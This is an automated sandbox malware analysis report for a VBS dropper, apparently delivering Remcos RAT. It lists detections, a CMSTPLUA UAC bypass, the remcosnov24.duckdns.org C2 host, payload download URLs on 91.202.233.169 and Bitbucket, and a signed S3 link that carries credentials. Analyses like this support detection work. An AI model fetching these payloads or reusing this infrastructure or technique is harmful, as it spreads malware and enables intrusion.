Windows Analysis Report sostener.vbs

AI detected suspicious sample

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\registros.dat, type: DROPPED

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

15_2_0043293A

Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_aa758384-0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00406764 _wcslen,CoGetObject,

15_2_00406764

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.196.57:443 -> 192.168.2.7:49747 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	15_2_0041B42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	15_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0044D5E9 FindFirstFileExA,	15_2_0044D5E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	15_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00406AC2 FindFirstFileW,FindNextFileW,	15_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	15_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	15_2_00418C69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	15_2_00408DA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

Suspicious execution chain found

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 00007FFAAC48AD53h		7_2_00007FFAAC48ACE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 00007FFAAC48D8A6h		7_2_00007FFAAC48D808

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49759 -> 190.9.223.135:4576
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 52.217.196.57:443 -> 192.168.2.7:49747
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 52.217.196.57:443 -> 192.168.2.7:49747
Source: Network traffic	Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 52.217.196.57:443 -> 192.168.2.7:49747
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 52.217.196.57:443 -> 192.168.2.7:49747

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: remcosnov24.duckdns.org

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp	String found in memory: Content-Security-Policy: connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io .ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in memory: connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io .ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-uri https://web-security-

Uses dynamic DNS services

Source: unknown

DNS query: name: remcosnov24.duckdns.org

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1

Yara detected Generic Downloader

Source: Yara match

File source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.7:49759 -> 190.9.223.135:4576

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /hector4576--/noviembre19/downloads/sos19nov.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNEU8mMXjgJqQ080SNiFV835eFr%2BbBRHNf7rm1neySGwglrM1o8LsYX0RovAU3W%2Bx4JB4pgdN4qsn1bW%2BfaD7XZjyLKF0JoYGK%2F0OwIw8v9GO6Ju75QefPFbX9xbLBwYMrmWW0lhQ%2B5mF%2BEx1g%3D%3D&Expires=1732092960 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 91.202.233.169 91.202.233.169
Source: Joe Sandbox View	IP Address: 185.166.143.49 185.166.143.49

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49769 -> 178.237.33.50:80

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AD/dll.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.202.233.169Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004260F7 recv,

15_2_004260F7

Source: global traffic	HTTP traffic detected: GET /hector4576--/noviembre19/downloads/sos19nov.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNEU8mMXjgJqQ080SNiFV835eFr%2BbBRHNf7rm1neySGwglrM1o8LsYX0RovAU3W%2Bx4JB4pgdN4qsn1bW%2BfaD7XZjyLKF0JoYGK%2F0OwIw8v9GO6Ju75QefPFbX9xbLBwYMrmWW0lhQ%2B5mF%2BEx1g%3D%3D&Expires=1732092960 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AD/dll.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.202.233.169Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: remcosnov24.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.202.
Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.169
Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/A
Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt
Source: powershell.exe, 00000007.00000002.1425303708.0000025F0E6E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt
Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.202.H
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bitbucket.org
Source: powershell.exe, 00000007.00000002.1515951705.0000025F28EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.veris
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpk
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpl
Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F11E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C410EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C32A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s3-w.us-east-1.amazonaws.com
Source: powershell.exe, 00000002.00000002.1540300511.0000022615AE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F103E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C31071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1540300511.0000022615AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1540300511.0000022615A9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F103E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C31071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
